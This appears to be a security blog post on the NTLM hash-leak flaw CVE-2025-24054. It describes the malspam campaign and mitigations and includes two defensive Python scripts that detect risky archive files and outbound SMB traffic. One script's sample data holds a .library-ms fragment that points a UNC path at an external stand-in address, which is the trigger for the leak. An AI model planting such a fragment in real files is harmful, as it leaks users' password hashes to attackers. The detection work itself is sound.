CVE-2025-24054: NTLM Exploit in the Wild – A Deep Look at the Latest NTLM Hash Disclosure Vulnerability

By Edi Rimkus



In our fast-evolving threat landscape, even long-trusted authentication protocols are coming under fire. The newly disclosed vulnerability, CVE-2025-24054, has been making headlines as it enables NTLM hash disclosure via spoofing, and its exploitation in the wild is raising alarms across both public and private sectors. Check Point Research has documented active abuse of this flaw, which poses severe risks to Windows environments worldwide.

Understanding NTLM and Its Significance

NTLM (New Technology LAN Manager) is a suite of authentication protocols developed by Microsoft to verify user identities during network logons. NTLM uses a challenge/response mechanism in which the user's password is never transmitted in plain text; instead, a hash derived from it is used to answer a challenge from the server. With the introduction of NTLMv2, Microsoft improved security by incorporating both server and client challenges into the authentication process. However, as attackers have proven time and again, even these improvements are not impervious. When an NTLM hash is intercepted, it can be relayed in pass-the-hash attacks or brute-forced offline, potentially paving the way for privilege escalation and lateral movement within networks.

The Vulnerability: CVE-2025-24054

CVE-2025-24054 is a critical flaw related to NTLM hash disclosure through spoofing techniques. At its core, the vulnerability is triggered by maliciously crafted .library-ms files. Here’s how the exploit works:

  • Trigger Mechanism:
    Although the flaw was originally believed to require the malicious file to be opened or executed, later analysis (and Microsoft’s patch documentation) indicated that minimal user interactions—such as right-clicking, drag-and-dropping, or merely navigating to the folder containing the file—are sufficient to trigger the exploit.

  • Exploitation Process:
    The crafted .library-ms file causes Windows Explorer to initiate an SMB (Server Message Block) authentication request to a remote server controlled by the attacker. As a result, the system unintentionally sends the user’s NTLMv2-SSP hash to that server. Once leaked, these hashes can be brute-forced to recover user passwords or relayed in further attacks to impersonate the user.

  • Similarity to Past Vulnerabilities:
    This vulnerability shares striking characteristics with CVE-2024-43451, indicating that threat actors are reusing and evolving techniques that exploit weaknesses in NTLM even after security improvements.

Active Exploitation in the Wild

Despite Microsoft releasing a patch on March 11, 2025, attackers wasted no time. Active exploitation was first noted on March 19, 2025—just eight days after the patch. A notable campaign, dubbed the "NTLM Exploits Bomb," targeted government and private institutions in Poland and Romania around March 20–21, 2025.

Real-World Campaign Details

  • Distribution Method:
    Victims received malspam emails containing Dropbox-hosted archives. These archives often included multiple files such as:

    • xd.library-ms – the primary file exploiting CVE-2025-24054

    • xd.url, xd.website, and xd.lnk – additional files capable of triggering SMB authentication requests

  • User Interaction Abuse:
    What makes this exploitation particularly dangerous is that it does not rely on complex user actions. Simply accessing the folder containing these malicious files—without even opening or executing them—can trigger the NTLM authentication and leak the hashes.

  • Global Impact:
    Attackers have set up SMB servers in various regions including Russia, Bulgaria, the Netherlands, Australia, and Turkey to collect the leaked authentication data. Downstream, these NTLMv2-SSP hashes are being used for offline brute force, NTLM relay attacks, and potentially full network compromise if the affected credentials belong to privileged users.
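The exploitation process and the distribution method above both come down to one observable: a file in an archive that, once displayed in Explorer, makes the machine reach out to an SMB host outside the organisation. The following triage routine, added here as an example and not code from the original post or from Check Point Research, inspects the members of such an archive and flags the file types named in the campaign plus any UNC path pointing at an external host. The sample archive contents are constructed, the internal address ranges (RFC 1918 plus loopback and link-local) are an assumption, and the `.corp.example` suffix is a placeholder for a real internal DNS suffix.

```python
"""Triage of archive members for files that can coerce an outbound SMB
authentication when merely displayed in Explorer.

Added example for this post; it is not code from the original article or from
Check Point Research. The sample archive contents below are constructed, the
internal-network ranges are an assumption (RFC 1918 plus loopback/link-local),
and the `.corp.example` suffix stands in for a real internal DNS suffix."""
import ipaddress
import re
from typing import Dict, List

# File types the campaign write-up names as able to trigger SMB authentication
# on folder view; every one of them is treated as high risk regardless of content.
RISKY_EXTENSIONS = {".library-ms", ".url", ".website", ".lnk"}

# Address ranges considered internal (assumption for this example).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_DNS_SUFFIX = ".corp.example"  # placeholder for the organisation's own suffix

# A UNC path: two backslashes, a host, a backslash and a share/path component.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\[^\s"<>]*')


def is_internal_host(host: str) -> bool:
    """True for RFC 1918/loopback/link-local IPs and names under the internal suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(INTERNAL_DNS_SUFFIX)
    return any(ip in net for net in INTERNAL_NETS)


def extract_unc_hosts(data: bytes) -> List[str]:
    """Return every UNC host referenced in the file, decoding both 8-bit text and
    UTF-16LE (shortcut files often store their strings as UTF-16)."""
    text = data.decode("latin-1") + "\n" + data.decode("utf-16-le", errors="ignore")
    return sorted(set(UNC_RE.findall(text)))


def triage_archive(members: Dict[str, bytes]) -> List[dict]:
    """Flag members with a risky extension or a UNC reference to an external host."""
    findings = []
    for name, data in members.items():
        ext = name[name.rfind("."):].lower() if "." in name else ""
        external = [h for h in extract_unc_hosts(data) if not is_internal_host(h)]
        if ext in RISKY_EXTENSIONS or external:
            findings.append({
                "file": name,
                "risky_extension": ext in RISKY_EXTENSIONS,
                "external_unc_hosts": external,
            })
    return findings


# Constructed archive contents: a library file fragment pointing at an address
# outside the organisation, a shortcut to an internal HTTPS site, and a note
# that mentions an internal file server.
SAMPLE_ARCHIVE: Dict[str, bytes] = {
    "xd.library-ms": b"<simpleLocation><url>\\\\203.0.113.10\\share</url></simpleLocation>",
    "invoice.url": b"[InternetShortcut]\r\nURL=https://intranet.corp.example/invoice\r\n",
    "readme.txt": b"See \\\\fileserver.corp.example\\docs for details.",
}

if __name__ == "__main__":
    for finding in triage_archive(SAMPLE_ARCHIVE):
        print(finding)
```

Run against the constructed archive, the routine reports `xd.library-ms` (risky extension and an external UNC host) and `invoice.url` (risky extension only), while `readme.txt` is left alone because its only UNC reference is to an internal server. The extension check is deliberately independent of the content check: a `.lnk` or `.website` file is worth quarantining even when no UNC string is visible, since the point of the campaign is that the file need only be listed, not opened.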

Implications and Threat Landscape

NTLM hash disclosure vulnerabilities like CVE-2025-24054 represent a significant shift in attack vectors. With minimal interaction required to trigger the leak, attackers can stealthily capture critical security data from unsuspecting users. The fact that threat actors quickly weaponized this vulnerability post-patch emphasizes two things:

  • The Need for Rapid Response: Organizations must implement patch management policies that not only focus on timely updates but also verify the effectiveness of applied patches.

  • Evolving Attack Tactics: Cybercriminals continue to refine their techniques by combining social engineering (e.g., malspam campaigns with convincing Dropbox links) with technical exploits, ensuring that even robust security measures can be bypassed with minimal effort.

Recommendations for Mitigation

Organizations can take several steps to protect themselves:

  • Apply Patches Immediately: Ensure every Windows system is updated with the latest patches released on March 11, 2025, to reduce vulnerability exposure.

  • User Awareness Training: Educate employees on the risks of interacting with suspicious emails and files—emphasizing that even minimal actions can trigger these exploits.

  • Enhanced Monitoring: Deploy advanced threat detection and monitoring systems, particularly focused on SMB traffic leaving the network (TCP port 445) and unusual authentication requests.

  • Network Segmentation and SMB Hardening: Limit exposure by segmenting networks and enforcing strict SMB security policies, such as SMB signing, to mitigate the risk of NTLM relay attacks.

  • Incident Response Preparedness: Develop and test incident response protocols specifically tailored to credential compromise and lateral movement scenarios.
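The monitoring and SMB-hardening recommendations above have a concrete network signature: a workstation inside the organisation opening a TCP connection to port 445 or 139 on an address outside it. The detection below, added here as an example and not code from the original post, parses firewall log lines and groups such connections by source host. The key=value log layout and every sample line are constructed, and the internal ranges are assumed to be RFC 1918 plus loopback and link-local.

```python
"""Detect outbound SMB from internal hosts to external destinations in firewall
logs: the network-level symptom of the hash leak described in the post.

Added example, not from the original article. The key=value log format and every
sample line are constructed, and the internal ranges are assumed to be RFC 1918
plus loopback/link-local."""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Optional

SMB_PORTS = {445, 139}   # SMB over TCP, and SMB over the NetBIOS session service
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed log layout: ISO timestamp followed by key=value fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)"
    r"\s+proto=(?P<proto>\S+)\s+action=(?P<action>\S+)\s*$")


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line; return None for lines that do not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def find_smb_egress(lines: List[str]) -> Dict[str, List[dict]]:
    """Group by source host every TCP connection to an SMB port whose destination is
    outside the internal ranges. Denied attempts are kept as well: a host that tried
    to reach SMB on the internet was coerced into an authentication attempt and
    should be investigated even though the block stopped the hash from leaving."""
    hits: Dict[str, List[dict]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"].lower() != "tcp":
            continue
        if rec["dport"] in SMB_PORTS and is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits[rec["src"]].append(rec)
    return dict(hits)


# Constructed sample: one workstation reaching an external SMB server twice
# (one allowed, one denied), legitimate internal SMB, normal HTTPS egress,
# a non-TCP line and a malformed line.
SAMPLE_LOG = """\
2025-03-20T10:15:02Z src=10.1.2.34 dst=203.0.113.10 dport=445 proto=tcp action=allow
2025-03-20T10:15:03Z src=10.1.2.34 dst=10.1.0.5 dport=445 proto=tcp action=allow
2025-03-20T10:16:11Z src=10.1.2.77 dst=198.51.100.23 dport=443 proto=tcp action=allow
2025-03-20T10:16:12Z src=10.1.2.34 dst=203.0.113.10 dport=139 proto=tcp action=deny
2025-03-20T10:17:40Z src=10.1.3.9 dst=198.51.100.50 dport=445 proto=udp action=allow
this line is not in the expected format
"""

if __name__ == "__main__":
    for src, events in find_smb_egress(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {len(events)} outbound SMB attempt(s) to external hosts")
        for e in events:
            print(f"  {e['ts']} -> {e['dst']}:{e['dport']} ({e['action']})")
```

On the constructed log only `10.1.2.34` is reported, with both its allowed and its denied attempt. In a production deployment the same rule is best paired with a perimeter policy that denies outbound 445 and 139 altogether, so that every match is a blocked attempt rather than a completed leak, and the source host can be pulled for the triage of whatever archive it recently opened.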

Conclusion

CVE-2025-24054 underscores the persistent challenges facing cybersecurity professionals when defending legacy protocols like NTLM. As attackers continuously adapt, organizations must remain agile—ensuring that they not only deploy patches promptly but also adopt a layered defense strategy. By understanding the mechanics of this exploit and learning from real-world campaigns, we can turn these vulnerabilities into lessons for building a more resilient security posture.

Stay vigilant, keep your systems updated, and continue to refine your defenses in the face of ever-evolving threats.

Feel free to share your thoughts or leave comments below if you have additional insights on mitigating NTLM-based threats. Let’s work together to foster a safer digital environment.
